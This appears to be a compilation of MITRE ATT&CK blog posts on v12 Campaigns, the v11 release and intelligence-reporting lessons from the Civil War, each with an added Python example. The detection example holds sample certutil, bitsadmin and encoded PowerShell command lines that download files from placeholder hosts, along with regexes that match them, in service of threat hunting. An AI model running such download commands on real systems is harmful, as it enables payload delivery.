  • last_seen (timestamp): The time that this Campaign was last seen or reported. ATT&CK makes use of this field only to the level of granularity of month/year. The day and time part of this timestamp field should be ignored by parsers when displaying ATT&CK Campaign information
  • objective: Not used by ATT&CK

Extensions of the STIX Spec:

  • x_mitre_first_seen_citation (string): One to many citations for when the Campaign was first reported in the form “(Citation: <citation name>)” where <citation name> can be found as one of the source_name of one of the external_references.
  • x_mitre_last_seen_citation (string): One to many citations for when the Campaign was last reported in the form “(Citation: <citation name>)” where <citation name> can be found as one of the source_name of one of the external_references.

As mentioned above, we have also added three new STIX Relationships that connect Campaigns to the rest of the ecosystem; namely that Campaigns can optionally be attributed to a Group, use Software, or use Techniques. The STIX Relationship objects themselves have no special modifications from the STIX standard and simply connect Campaigns to those previously existing objects. At a glance this seems straightforward enough, but there are some things to be aware of if you are parsing ATT&CK v12 STIX going forward.

When gathering data about Groups that have Campaigns attributed to them, it’s a bit more complex to parse out all the Techniques and Software used by the Group. For Campaigns associated with a Group, we won’t be creating relationships between the Techniques and Software in that Campaign and the Group; if you would like to view the inclusive list, you’ll need to combine technique sets and Software usage.

Combining Technique Sets: To get a comprehensive Group Technique view, you’ll need to combine the set of Techniques that are directly used by the Group with the set of Techniques used by all of their associated Campaigns.

Figure 7: Example of Group Technique STIX inheritance

Mapping Software Object Usage: To holistically map out Software object usage, you’ll identify the Groups, the Group-attributed Campaigns, and the unattributed Campaigns using the Software, and combine them for the full picture.

For further technical details on how to handle retrieving all Techniques or Software that a Group uses starting with the v12 release and how it differs from the v11 and prior releases, please refer to the Relationships Microlibrary section of the GitHub Usage document.
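The following is an added example (not ATT&CK’s own code, and not the Relationships Microlibrary referenced above) that puts the two parsing rules described here, the Campaign field conventions (month/year granularity for first_seen/last_seen, “(Citation: …)” markers resolved through external_references) and the Group inheritance of Campaign Techniques and Software, into working Python against a constructed miniature bundle. G9999, C9999, C9998 and S9999 are placeholder IDs, not real ATT&CK entries; the relationship types `attributed-to` and `uses` and the `revoked`/`x_mitre_deprecated` flags are the ones ATT&CK’s STIX already uses.

```python
"""Walk an ATT&CK v12-style STIX bundle that carries Campaign objects.

Added example, not ATT&CK's own code or its Usage-document microlibrary.
The bundle below is constructed for illustration: G9999, C9999, C9998 and
S9999 are placeholder IDs, not real ATT&CK entries.
"""
import re
from datetime import datetime

CITATION_RE = re.compile(r"\(Citation: ([^)]+)\)")


def _obj(stix_type, stix_id, ext_id, refs=(), **extra):
    """Minimal ATT&CK-style STIX object: the ATT&CK ID lives in external_references."""
    return {"type": stix_type, "id": stix_id, "name": ext_id,
            "external_references": [{"source_name": "mitre-attack", "external_id": ext_id}, *refs],
            **extra}

def _rel(rel_type, src, dst):
    return {"type": "relationship", "id": f"relationship--{src}--{dst}",
            "relationship_type": rel_type, "source_ref": src, "target_ref": dst}

BUNDLE = {"type": "bundle", "objects": [          # constructed sample data
    _obj("intrusion-set", "intrusion-set--g1", "G9999"),
    _obj("campaign", "campaign--c1", "C9999",
         first_seen="2021-03-15T00:00:00.000Z", last_seen="2022-09-01T12:30:00.000Z",
         x_mitre_first_seen_citation="(Citation: Vendor Report 2021)",
         x_mitre_last_seen_citation="(Citation: Vendor Report 2022)(Citation: Blog 2022)",
         refs=[{"source_name": "Vendor Report 2021", "url": "https://example.invalid/r2021"},
               {"source_name": "Vendor Report 2022", "url": "https://example.invalid/r2022"},
               {"source_name": "Blog 2022", "url": "https://example.invalid/blog"}]),
    _obj("campaign", "campaign--c2", "C9998"),                 # no attributed-to: unattributed
    _obj("attack-pattern", "attack-pattern--t1", "T1566.001"),
    _obj("attack-pattern", "attack-pattern--t2", "T1625.001"),
    _obj("attack-pattern", "attack-pattern--t3", "T1400", revoked=True),  # revoked: never surfaced
    _obj("malware", "malware--s1", "S9999"),
    _rel("uses", "intrusion-set--g1", "attack-pattern--t1"),
    _rel("attributed-to", "campaign--c1", "intrusion-set--g1"),
    _rel("uses", "campaign--c1", "attack-pattern--t2"),
    _rel("uses", "campaign--c1", "attack-pattern--t3"),
    _rel("uses", "intrusion-set--g1", "malware--s1"),
    _rel("uses", "campaign--c1", "malware--s1"),
    _rel("uses", "campaign--c2", "malware--s1"),
]}


def attack_id(obj):
    """ATT&CK external ID (G..., C..., T..., S...) of a STIX object."""
    return next(r["external_id"] for r in obj["external_references"]
                if r["source_name"] == "mitre-attack")

def active(obj):
    """Revoked or deprecated objects stay in the bundle but must not be displayed."""
    return not obj.get("revoked") and not obj.get("x_mitre_deprecated")

def get_object(bundle, stix_id):
    return next(o for o in bundle["objects"] if o["id"] == stix_id)

def relationships(bundle, rel_type, source_id=None, target_id=None):
    """Yield active relationship objects of one type, optionally filtered by either end."""
    for obj in bundle["objects"]:
        if (obj["type"] == "relationship" and obj["relationship_type"] == rel_type and active(obj)
                and (source_id is None or obj["source_ref"] == source_id)
                and (target_id is None or obj["target_ref"] == target_id)):
            yield obj

def group_techniques(bundle, group_id):
    """Techniques used directly by a Group plus those used by its attributed Campaigns (Figure 7)."""
    users = [group_id] + [r["source_ref"] for r in relationships(bundle, "attributed-to", target_id=group_id)]
    ids = set()
    for user in users:
        for rel in relationships(bundle, "uses", source_id=user):
            target = get_object(bundle, rel["target_ref"])
            if target["type"] == "attack-pattern" and active(target):
                ids.add(attack_id(target))
    return sorted(ids)

def software_users(bundle, software_id):
    """Groups, Group-attributed Campaigns and unattributed Campaigns that use a Software object."""
    out = {"groups": set(), "attributed_campaigns": set(), "unattributed_campaigns": set()}
    for rel in relationships(bundle, "uses", target_id=software_id):
        user = get_object(bundle, rel["source_ref"])
        if not active(user):
            continue
        if user["type"] == "intrusion-set":
            out["groups"].add(attack_id(user))
        elif user["type"] == "campaign":
            attributed = any(relationships(bundle, "attributed-to", source_id=user["id"]))
            out["attributed_campaigns" if attributed else "unattributed_campaigns"].add(attack_id(user))
    return {k: sorted(v) for k, v in out.items()}

def campaign_timeframe(campaign):
    """first_seen/last_seen are meaningful only to month/year; day and time are dropped."""
    month = lambda ts: datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ").strftime("%Y-%m")
    return month(campaign["first_seen"]), month(campaign["last_seen"])

def campaign_citations(campaign, field):
    """Resolve each '(Citation: name)' marker to the external_references entry of that source_name."""
    refs = {r["source_name"]: r for r in campaign["external_references"]}
    return [(name, refs[name].get("url")) for name in CITATION_RE.findall(campaign.get(field, ""))]
```

Run `group_techniques(BUNDLE, "intrusion-set--g1")` and the Group picks up T1625.001 from its attributed Campaign while the revoked T1400 stays hidden; `software_users(BUNDLE, "malware--s1")` separates the Group, the attributed Campaign and the unattributed one, which is the three-way split the text asks you to combine for the full picture.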

What to Expect Going Forward

We’ll continue modifying and building out Campaigns, with the eventual goal of revisiting major Group pages in ATT&CK and reconstructing earlier Campaigns to reflect how these actors have evolved over time. We’ll also shift focus from one-off or unattributed Campaigns to more complex Campaigns attributed to some of the more populated Group entries, such as the SolarWinds intrusion and G0016/APT29.

Campaigns will also serve a key role in tying together the various ATT&CK matrices — Enterprise (Cloud, Containers, macOS, and Linux), Mobile, and ICS, to further document how adversaries pivot across these domains using a variety of techniques to accomplish their objectives.

We greatly appreciate the community’s feedback on Campaigns to date, and as we continue to develop Campaigns, we welcome your input. Our Contributions page will be updated in the near future to include more detailed guidance and we look forward to connecting with you via email, Slack, or Twitter.

©2022 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00744–13.


Introducing ATT&CK Campaigns was originally published in MITRE ATT&CK® on Medium.

ATT&CK Goes to v11

ATT&CK Goes to v11: Structured Detections, Beta Sub-Techniques for Mobile, and ICS Joins the Band

These go to eleven

By Adam Pennington and Jason Ajmo

Right on cue, ATT&CK’s latest release is out, and this time we’ve gone to v11! If you’ve been following along with our roadmap there shouldn’t be any huge surprises in store, but we wanted to take a chance to go over our latest changes. The v11 set list includes detections now paired with related Data Sources: Data Components, a beta version of sub-techniques for ATT&CK for Mobile, ATT&CK for ICS on attack.mitre.org, as well as regular updates/additions across Techniques, Software, and Groups.

ATT&CK for Enterprise Structured Detections

Over the past few years, transforming various actionable ATT&CK fields into managed objects has been a recurring theme. In v5 of ATT&CK, we converted mitigations into objects to enhance their value and usability — with this conversion, you can now identify a mitigation and pivot to various techniques it can potentially prevent. This has been a feature that many of you have leveraged to map ATT&CK to different control/risk frameworks. We previously converted data sources to objects for the v10 release, enabling similar pivoting and analysis opportunities.

In today’s v11 release we’ve taken a parallel approach for detections in Enterprise ATT&CK, taking the previously free-text detections featured in Techniques and refining and merging them into descriptions that are connected to Data Sources. We have typically tried to match the detection text on a Technique to its Data Sources, but this makes the pairing explicit. You can now see, for each detection, what you need to collect as inputs (Data Sources) paired with how you could analyze that data to identify a given Technique (detection). Below is an example of how Data Sources and Detections have changed for Steal or Forge Kerberos Tickets (T1558).

Data sources and detections in ATT&CK v10 for Steal or Forge Kerberos Tickets (T1558)
Data sources and detections in ATT&CK v11 for Steal or Forge Kerberos Tickets (T1558)

Detections will also now be included on Data Source pages, associated with each Technique listed for a Data Component.

As with everything else in ATT&CK, these new detections also appear in our STIX as a part of the “detects” relationship added in our last ATT&CK release in its “description” field. For more information about ATT&CK’s STIX representation, including the data source objects and relationships added in ATT&CK v10, you can check out our STIX usage document.

Mobile Sub-Techniques Beta

In 2020, we added Sub-Techniques to ATT&CK for Enterprise. In the time since, they’ve been well-received and solved some of the growth issues we were having in our biggest matrix. As ATT&CK’s Mobile Lead Jason Ajmo recently talked about in the ATT&CK Blog, we’re now bringing this improvement to ATT&CK for Mobile as a beta release. The content on the main ATT&CK site now contains the Sub-Techniques beta, and the current, stable Mobile content can be accessed at https://attack.mitre.org/versions/v10/matrices/mobile/. We plan on making ATT&CK for Mobile with Sub-Techniques final this summer, after we’ve given the community time to check out the content, get ready for it, and send us any feedback they have to [email protected]. Until that time, the main STIX representation of ATT&CK for Mobile will remain the v10 pre-Sub-Techniques version.

How can I move to the beta ATT&CK for Mobile with sub-techniques?

First, you’ll need to support some changes to Mobile ATT&CK’s technique structure necessary to support sub-techniques. If you’re already using or have moved to versions of ATT&CK for Enterprise with sub-techniques, the structural changes and the process of moving are identical. As with ATT&CK for Enterprise, we’ve expanded Mobile technique IDs to identify corresponding sub-techniques: T[technique].[sub-technique]. In Mobile’s STIX representation of ATT&CK we’ve added the “x_mitre_is_subtechnique = true” to “attack-pattern” objects that represent a sub-technique, and “subtechnique-of” relationships between techniques and sub-techniques. Both are already contained in our STIX documentation. You can find a STIX representation of ATT&CK that includes the v11 Mobile Beta here.

Next, you may want to get a head start and remap your content from a previous version of Mobile ATT&CK to this beta release. As we did when we released Sub-Techniques for ATT&CK for Enterprise, we’re providing a translation table, or “crosswalk”, from previous-release Mobile technique IDs to beta ones to help with the transition. The JSON file shows what happened to each technique in the beta release. The top-level technique ID represents each technique from the v10 release, and the structure underneath shows what changed with the v11 beta release, if anything.

Thanks to the excellent feedback from the community, we identified four key types of changes:

  1. Remains Technique
  2. Became a Sub-Technique
  3. One or More Techniques Became New Technique
  4. Deprecated

Each of these types of changes is represented in the “change-type” field in the JSON. Some of these changes are simpler to implement than others. We recognize this, and in the following steps, we incorporate the four types of changes into tips on how to move from our previous release to ATT&CK with sub-techniques.

Step 1: Start with the easy-to-remap techniques first and automate

For “Remains Technique”, “Became a Sub-Technique”, or “One or More Techniques Became New Technique” change types you can replace the previous technique ID with the new technique ID.

In some cases, technique names have changed, or tactics have been removed, so it’s also worth checking the “explanation” in the JSON.

Remains Technique

The first thing that’s easy to remap — the techniques that aren’t changing and don’t need to be remapped. Anything labeled “Remains Technique” is still a technique with an unchanged technique ID like T1398 in the above example.

Became a Sub-Technique

Next in the “easy to remap category” are the technique to sub-technique transitions, labeled “Became a Sub-Technique”. These techniques were converted into the sub-technique of another technique. In this example, Modify System Partition (T1400) became Hijack Execution Flow: System Runtime API Hijacking (T1625.001).

Finally, there are a few techniques that merged with other techniques.

One or More Techniques Became New Technique

For techniques labeled “One or More Techniques Became New Technique” a new technique was created covering the scope and content of one or more previous techniques. For example, Network Traffic Capture or Redirection (T1410) and a few other techniques merged together to create Adversary-in-the-Middle (T1638).

For any of these “easy” types of changes anything represented by the previous ATT&CK technique ID should be transitioned to the new technique or sub-technique ID. The ATT&CK STIX objects represent this type of change as a revoked object which leaves behind a pointer to what they were revoked by. In the case of T1400, that means it was revoked by T1625.001.

In all of these cases, it’s enough to take what’s listed as the top-level key and replace it with what’s listed in the nested “id” key.

Step 2: Look at the deprecated techniques to see what changed

This is where some manual effort will take place. Deprecated techniques are not as straightforward.

Deprecated

For techniques labeled as “Deprecated”, we removed them from ATT&CK without replacing them. They were deprecated because we felt they did not fit into ATT&CK or due to a lack of observed in-the-wild use. For example, Remotely Wipe Data Without Authorization (T1469) was removed because we hadn’t been able to find evidence of any adversary using it in the wild.

Step 3: Review the techniques that have new sub-techniques to see if the new granularity changes how you’d map

If you want to take full advantage of sub-techniques, there’s one more step. Many “Remains Technique” techniques now have new sub-techniques you can take advantage of.

One great example of an existing technique that now has new sub-techniques is Application Discovery (T1418). Its name was updated to Software Discovery, and its content was broken out into a new sub-technique: Security Software Discovery (T1418.001).

The new sub-techniques add more detail and taking advantage of them will require some manual analysis. The good news is that the additional granularity will allow you to represent different types of software discovery that can happen at a more detailed level. These types of remaps can be done over time, because if you keep something mapped to Software Discovery, then it’s still correct. You can map new stuff to the sub-techniques and come back to the old ones to make them more precise as you have time and resources.

TL;DR, if you do just Step 1 while mapping things that are deprecated to NULL, then it will still be correct. If you do Step 2, then you’ll have pretty much everything you mapped before now also mapped to the new Mobile ATT&CK. If you complete Step 3, then you’ll get the newfound power of sub-techniques!
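The three steps above, as an added example that is not ATT&CK’s own crosswalk file or tooling: a small Python routine that applies a crosswalk to an existing analytic-to-technique mapping, replacing IDs automatically for the three easy change types (Step 1), mapping deprecated techniques to None and listing them (Step 2), and listing every “Remains Technique” entry so an analyst can decide whether a new sub-technique fits better (Step 3). The crosswalk dictionary is constructed from the examples in this post; the real JSON may carry more keys than the “change-type”, “id” and “explanation” fields it names, and the analytic names and T1999 are placeholders.

```python
"""Apply a v10 -> v11 Mobile technique crosswalk to an existing mapping.

Added example, not ATT&CK's own crosswalk or tooling. CROSSWALK is
constructed from the examples in the post; the analytic names and T1999
are placeholders.
"""

# Constructed crosswalk: top-level key is the v10 technique ID, nested is what happened in v11.
CROSSWALK = {
    "T1398": {"change-type": "Remains Technique", "id": "T1398",
              "explanation": "Unchanged."},
    "T1400": {"change-type": "Became a Sub-Technique", "id": "T1625.001",
              "explanation": "Modify System Partition became Hijack Execution Flow: System Runtime API Hijacking."},
    "T1410": {"change-type": "One or More Techniques Became New Technique", "id": "T1638",
              "explanation": "Network Traffic Capture or Redirection merged into Adversary-in-the-Middle."},
    "T1469": {"change-type": "Deprecated", "id": None,
              "explanation": "Remotely Wipe Data Without Authorization: no evidence of in-the-wild use."},
    "T1418": {"change-type": "Remains Technique", "id": "T1418",
              "explanation": "Renamed Software Discovery; content broken out into T1418.001."},
}

# Step 1 change types: the old ID can be swapped for the nested "id" without analyst review.
AUTOMATIC = {"Remains Technique", "Became a Sub-Technique",
             "One or More Techniques Became New Technique"}


def remap(mapping, crosswalk):
    """Return (new_mapping, report) for a {item: v10_technique_id} mapping.

    Step 1: automatic ID replacement for the three easy change types.
    Step 2: deprecated techniques map to None and are listed for manual review.
    Step 3: 'Remains Technique' entries are listed so the analyst can check
            whether one of the new sub-techniques is now a better fit.
    IDs missing from the crosswalk are kept unchanged and reported, never dropped.
    """
    new_mapping = {}
    report = {"deprecated": [], "review_for_subtechniques": [], "unknown": []}
    for item, old_id in mapping.items():
        entry = crosswalk.get(old_id)
        if entry is None:
            new_mapping[item] = old_id
            report["unknown"].append(item)
            continue
        change = entry["change-type"]
        if change in AUTOMATIC:
            new_mapping[item] = entry["id"]
            if change == "Remains Technique":
                report["review_for_subtechniques"].append(item)
        elif change == "Deprecated":
            new_mapping[item] = None
            report["deprecated"].append(item)
        else:
            raise ValueError(f"unrecognised change-type {change!r} for {old_id}")
    return new_mapping, report


# Constructed analytic-to-technique mapping of the kind a team keeps for coverage tracking.
SAMPLE_MAPPING = {
    "analytic-01": "T1400",
    "analytic-02": "T1410",
    "analytic-03": "T1469",
    "analytic-04": "T1418",
    "analytic-05": "T1398",
    "analytic-06": "T1999",   # placeholder ID deliberately absent from the constructed crosswalk
}

if __name__ == "__main__":
    updated, notes = remap(SAMPLE_MAPPING, CROSSWALK)
    for item, new_id in updated.items():
        print(f"{item}: {SAMPLE_MAPPING[item]} -> {new_id}")
    print(notes)
```

Applying only Step 1 and Step 2 (the automatic swaps plus None for deprecated entries) already yields a mapping that is correct for the v11 beta; the `review_for_subtechniques` list is the Step 3 backlog you can work through as time allows.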

ATT&CK for ICS Joins attack.mitre.org

ATT&CK for ICS launched at the beginning of 2020 on a MediaWiki site similar to how attack.mitre.org used to appear. Being on a separate site has let it develop and mature independently while we’ve added it to one ATT&CK resource at a time. Today we’ve added ATT&CK for ICS to our most visible resource, the ATT&CK website (attack.mitre.org).

What’s changed? First off, ATT&CK for ICS will no longer have that nostalgic ATT&CK Wiki look and feel, and links to ATT&CK for ICS will need to be updated. Second, we’ve merged the Groups and Software from ICS, adding ICS techniques to Group and Software pages that existed on both sites, and updating descriptions to include both.

Finally, we’ve merged Data Sources and Data Components in from ATT&CK for ICS. Since there’s quite a bit of overlap between ICS and Enterprise Data Sources we’ve added a filter that allows you to see just Enterprise, just ICS, and all Data Sources and Components on both the overall Data Sources list and individual Data Source pages.

What hasn’t changed? ATT&CK for ICS’s content hasn’t changed and its STIX representation remains in the same place. We will also be keeping the previous website in place until October 2022 to avoid breaking your deep links. We will have increasingly dire warnings on each page reminding people to update their links before it is eventually deprecated. In the future, content will only be updated on attack.mitre.org and not the MediaWiki site.

What’s Left in 2022?

We’ve just released our 2022 roadmap and continue to work across the framework. In v12 we plan on adding a new object related to groups in ATT&CK, Campaigns. Check out the slides from Matt Malone’s talk from ATT&CKcon 3.0, our recent roadmap blog post, or stay tuned for more details coming soon about their implementation.

We continue our work on improving the macOS platform and plan to focus on improvements to Linux between now and October. Please reach out to us via [email protected] or via our Slack if you’d like to contribute knowledge of what adversaries have been up to on either platform.

As always, if you have feedback, comments, contributions, or just want to ask questions, connect with us on email, Twitter, or Slack.

©2022 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00744–2.


ATT&CK Goes to v11 was originally published in MITRE ATT&CK® on Medium.

Intelligence Failures of Lincoln’s Top Spies: What CTI Analysts Can Learn From the Civil War

Guest Post by ATT&CKcon 3.0 Keynote Speaker, Selena Larson

Allan Pinkerton (Alexander Gardner — Library of Congress)

At the onset of the Civil War, a man whose name would eventually become synonymous with famous American detectives was reportedly providing false reports to the Union’s top general. Allan Pinkerton, who once successfully smuggled Abraham Lincoln into Washington, D.C. to avoid a rumored assassination attempt before he was even sworn in as president, acted as General George McClellan’s top intelligence officer. He was considered one of the best spymasters in the United States, responsible for effectively founding the nation’s first secret service.

In this piece, we’ll dive into some major intelligence reporting failures that dogged the renowned spymaster, how effective and concise intelligence reporting can change the course of history, and how the MITRE ATT&CK framework can help streamline and effectively communicate actionable threat intelligence.

Pinkerton was a detective when he first got to know Lincoln, but quickly became an indispensable intelligencer for the Union, first in the nation’s capital and then on the battlefield, working as a Civil War spymaster in 1861–1862. He operated a large team of spies who conducted counterespionage operations throughout Washington and information gathering expeditions into enemy territory. Pinkerton’s successes and failures are many — he made many of his own tactical intelligence failures that cost at least one spy his life during the Civil War — but there is a lot modern day intelligence analysts can learn from him. Specifically, from his intelligence reports.

According to Douglas Waller, author of Lincoln’s Spies, Pinkerton was not very good at validating or communicating information, or transforming it from data into intelligence. Throughout his time operating a secret service on behalf of the Union, he collected a lot of information. But that information was frequently poorly vetted, based on single sources, or received from biased narrators. And often, the information was ineffectively communicated, or outright falsified.

By dissecting the failures of the nation’s first intelligence service spymaster, modern day threat intelligence analysts can learn how and why effective intelligence communication and report writing can have major effects on an organization — and, in some cases, have the potential to change the course of history.

HiPPO Bias

One of the biggest failures plaguing Pinkerton’s reporting apparatus was his desire to please his boss. General McClellan was famously slow to take any offensive actions against the enemy, holding a deep fear of failure that paralyzed him into inaction.

McClellan reportedly believed the Confederate military to be much larger than it actually was, in part due to the “intelligence” provided to him by his top spy. In fact, the relationship between Pinkerton and McClellan was more like a self-licking ice cream cone. While stationed with McClellan in Washington, Virginia, and Maryland, Pinkerton worked his network of operators to collect information on enemy troop movement and the size of the Confederate army. Sometimes information proved to be correct; other times it was outright false. But in most cases, Pinkerton cherry-picked data that supported his boss’s beliefs of an opposing force either equal to or out-sizing the Union military, ignoring accurate information on the small size of the Confederate forces and further inflating already inflated estimates to appeal to McClellan’s beliefs.

“Loyal to the point of sycophancy, Pinkerton never doubted the general’s ability as a commander. Instead of serving his country or his president as a true intelligence officer, he made his friend happy.” Lincoln’s Spies

Pinkerton was demonstrating Highest Paid Person’s Opinion (HiPPO) bias, or the idea that analysts collect and disseminate information in a way that favors or appeals to existing beliefs within an organization, typically driven by leadership.

“Pinkerton admitted that he and McClellan had conspired to cook the books. In a later November 15 letter to the general, Pinkerton explained that his estimate of Confederate strength ‘was made large, as intimated to you at the time, so as to be sure to cover the entire number of the Enemy that our army was to meet.’ The controversial sentence appeared to show that before Pinkerton issued his October 4 report [reporting double the total number of actual Confederate troops], he and McClellan agreed to deliberately inflate the confederate numbers to be sure they included troops Pinkerton’s agents might not know about. ”

This can be a frequent issue for analysts tasked with certain objectives and directives, but it can also be detrimental to the organization’s decision making and ultimate success. For example, if leadership believes that Russian state-sponsored threats are the most important and likely the most targeted to their organization, defenders and analysts will be spending more key resources hunting for and defending against these threats, with the potential to miss or disregard tactics, techniques, and procedures (TTPs) associated with other relevant, but different, activity.

Use data to build your case. In her 2019 ATT&CKcon 2.0 keynote, Google’s Toni Gidwani explained how the MITRE ATT&CK matrix can be a “powerful corrective” to HiPPO bias and enable security teams to understand what is happening in the landscape and how it translates to impacts on their organizations.

Beyond indicators of compromise (IOCs), ATT&CK allows defenders to visualize threat behaviors in a digestible way to show what TTPs are observed and impacting an organization versus what stakeholders expect or want to focus on.

Analysts can create mappings of MITRE ATT&CK techniques to the malware, malware families, and behaviors observed in their environment. Subsequently, analysts can craft search queries to support threat hunting and detection efforts, for example by mapping and searching on specific execution techniques, such as certutil or BITSAdmin being used to download follow-on payloads.

By identifying the most impactful behaviors, and possible gaps in defense, security teams can prioritize hunting, detection, and response based on observable threat behaviors rather than requests or knee-jerk reactions from stakeholders.
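The mapping-and-tallying approach the preceding paragraphs describe, as an added example that is not code from the original post or from MITRE: constructed process-creation events are matched against a small, hand-picked set of command-line patterns for three real ATT&CK technique IDs (T1105 Ingress Tool Transfer, T1197 BITS Jobs, T1059.001 PowerShell), the observed techniques are counted to rank hunting priorities, and the result is compared with the techniques stakeholders expected to see. The detection patterns and the sample events are assumptions built for this illustration, not an exhaustive or production ruleset.

```python
"""Map endpoint process-creation events to ATT&CK techniques and tally them,
so hunting and detection priorities rest on observed behavior rather than on
stakeholder expectation. Added example, not code from the original post."""
import re
from collections import Counter

# Technique IDs are real ATT&CK identifiers. The command-line patterns are a
# small hand-picked set for this example (an assumption), not a full ruleset.
TECHNIQUE_RULES = [
    ("T1105", "Ingress Tool Transfer",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("T1197", "BITS Jobs",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("T1059.001", "PowerShell",
     re.compile(r"\bpowershell(\.exe)?\b.*(-enc(odedcommand)?\b|downloadstring)", re.I)),
]

# Constructed sample events: (hostname, parent image, command line).
# Hosts and URLs are placeholders; nothing here is a real observation.
SAMPLE_EVENTS = [
    ("ws-101", "winword.exe",
     "certutil.exe -urlcache -split -f http://example.invalid/a.dat C:\\Users\\Public\\a.dat"),
    ("ws-101", "cmd.exe",
     "bitsadmin.exe /transfer job1 http://example.invalid/b.bin C:\\Users\\Public\\b.bin"),
    ("ws-102", "excel.exe", "powershell.exe -nop -w hidden -enc QQBCAEMA"),
    ("ws-103", "svchost.exe", "certutil.exe -verify C:\\certs\\corp.cer"),  # benign use, no URL
    ("ws-104", "explorer.exe", "notepad.exe C:\\notes.txt"),
    ("ws-105", "cmd.exe", "CertUtil -urlcache -f https://example.invalid/c.ps1 c.ps1"),
]


def map_event(cmdline):
    """Return (technique_id, technique_name) for the first matching rule, else None."""
    for tid, name, pattern in TECHNIQUE_RULES:
        if pattern.search(cmdline):
            return tid, name
    return None


def map_events(events):
    """Tag each event with its ATT&CK technique; events matching no rule are dropped."""
    hits = []
    for host, parent, cmdline in events:
        match = map_event(cmdline)
        if match:
            hits.append({"host": host, "parent": parent, "cmdline": cmdline,
                         "technique": match[0], "name": match[1]})
    return hits


def technique_counts(events):
    """Frequency of each observed technique; the basis for prioritisation."""
    return Counter(hit["technique"] for hit in map_events(events))


def compare_to_expectation(observed, expected):
    """Contrast what the data shows with what stakeholders expected to see.

    Returns techniques that were expected but never observed, and techniques
    that were observed but nobody asked about, each sorted by technique ID.
    """
    obs, exp = set(observed), set(expected)
    return {"expected_not_seen": sorted(exp - obs),
            "seen_not_expected": sorted(obs - exp)}


if __name__ == "__main__":
    counts = technique_counts(SAMPLE_EVENTS)
    for tid, n in counts.most_common():
        print(f"{tid:<10} observed {n} time(s)")
    # Leadership expected T1105 and T1566.001 (Spearphishing Attachment).
    print(compare_to_expectation(counts, ["T1105", "T1566.001"]))
```

Run on the constructed events, the script ranks T1105 first (two hosts), then T1197 and T1059.001, and reports that the expected T1566.001 never appeared while T1197 and T1059.001 did, which is the kind of evidence that lets a team argue priorities from observation rather than from a stakeholder's assumption. The benign certutil invocation on ws-103 is deliberately left unmatched to show that a rule keyed on the download pattern, not the binary name alone, keeps the count meaningful.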

Ultimately, Pinkerton’s analysis failed his organization — his reporting coupled with McClellan’s ego and general aversion to taking decisive action may have cost the Union military successes early on in the Civil War.

Reporting Is Not Letter Writing

In addition to some reports containing easily disproved inaccuracies, Pinkerton and many of his staff typically wrote very long reports, with much of the key details hidden among flowery language, tens of pages deep. Effectively communicating actionable intelligence is a common issue with cyber threat intelligence dissemination, and it’s nice to know our predecessors experienced similar flaws.

“He always wrote [intelligence reports] in the form of a letter, and they began with a flowery opening officers of the day commonly used, such as ‘I have the honor to report…’” Lincoln’s Spies

Pinkerton also reportedly doodled in the margins, drawing cartoon fingers to indicate what the most important parts of the reports were.

Succinctly and effectively communicating intelligence through written reports is difficult, but there are some key characteristics of good intelligence reporting that can help improve efficiency, streamline the writing process, and provide stakeholders with relevant data.

Put the most important information first. Frequently referred to as stating the Bottom Line Up Front (BLUF), immediately detailing the findings of your reporting and why they matter to an organization is crucial. This can be considered the “So What?” portion of the report. Most people — especially key stakeholders like executive audiences — will not read every word of an in-depth intelligence report. It is therefore important to ensure that in the short amount of time allotted for consuming reporting, they can read and understand the points that matter most.

Be concise. Pinkerton didn’t need flowery language and neither do you. I have said this before, but I firmly believe people should not require a thesaurus to read and understand threat intelligence reporting. The report should contain relevant information such as: What happened, why does it matter, and what can we do about it? Items such as anecdotes, extraneous clauses, and navel-gazing are generally unnecessary.

Consider your audience. Executives likely don’t need details of deconstructed malware. Security operations analysts likely don’t need geopolitical analysis of events occurring in places where the business does not operate. Threat intelligence analysts should always be aware of who is reading reports and why. Make sure you know the answer to: What decisions are being made based on this data? Gathering intelligence requirements and understanding how your audience is using intelligence throughout the organization can help shape and improve your reporting.

MITRE ATT&CK has become the universal framework for threat actor TTPs, and can be used to quickly distill and communicate threat intelligence. But where and how it’s used varies based on the audience receiving the information.

For example, in February 2022, intelligence agencies from the United States and United Kingdom published a joint advisory on a new malware called Cyclops Blink targeting small office/home office routers attributed to the Russian state actor Sandworm. The 10-page advisory was designed as an overview of the malware and related threats, documenting Sandworm’s historic and current activity and its relevance in the overall threat landscape. In this report, the MITRE ATT&CK mappings were presented at the end, to add additional insight and technical details to an otherwise fairly high-level, strategic report. However, in a companion malware analysis report published by the UK’s National Cyber Security Centre, the ATT&CK mappings were presented on page three of 20, demonstrating the framework can be used to summarize tactical threat intelligence.

Like any tool, where and how you use MITRE ATT&CK to document TTPs is crucial for an audience’s understanding of the threats.

Always Evaluate OSINT

While Pinkerton collected massive amounts of information and distributed it wholesale to his superiors, there was little explanation given of where the information came from or its validity.

“Rarely did Pinkerton include in his reports an evaluation of a source’s reliability beyond a general impression he had of it.” Lincoln’s Spies

Pinkerton was operating based on human intelligence, information collected by his operatives in the field. Much of it was gossip; some of it reached his ears by a convoluted game of telephone. A lot of it was reliable and accurate — some of it was not.

As intelligence analysts, understanding and evaluating the veracity of information is crucial to communicating and acting on it. Primary sources of intelligence — the data we collect on our networks — we typically understand to be reliable. But we also rely on open source intelligence (OSINT) to form a whole picture of adversary threat behaviors and an understanding of the threat landscape.

Unfortunately, there is a lot of bad information on the internet. The online claims of unconfirmed hacking campaigns during the ongoing war in Ukraine are an excellent example of information spreading far and wide without validation, and likely making it into intelligence briefings on the conflict.

There are multiple questions analysts should ask themselves when reviewing third-party data to support original research, for example:

  • What is the visibility of the individual or organization?
  • What evidence are their claims based on?
  • Is this evidence available to me?
  • Does this overlap with known threat activity?
  • Cui bono? Or, who benefits and how?

There is always inherent bias in visibility; vendors or anti-virus companies will only have data from the organizations and geographies in which it is used. If the visibility is limited, it might not be an effective source for verifying or supporting existing hypotheses. Being able to independently validate or invalidate evidence provided in open-source artifacts with internal tools and resources can help further your own investigations or reporting. And finally, considering political, financial, economic, etc. motivations in external reporting can help identify potential biases in reporting and inform your assessments of a source’s reliability.

The MITRE ATT&CK framework exists in part to help answer these questions, especially for providing validated, authoritative third-party intelligence reporting.
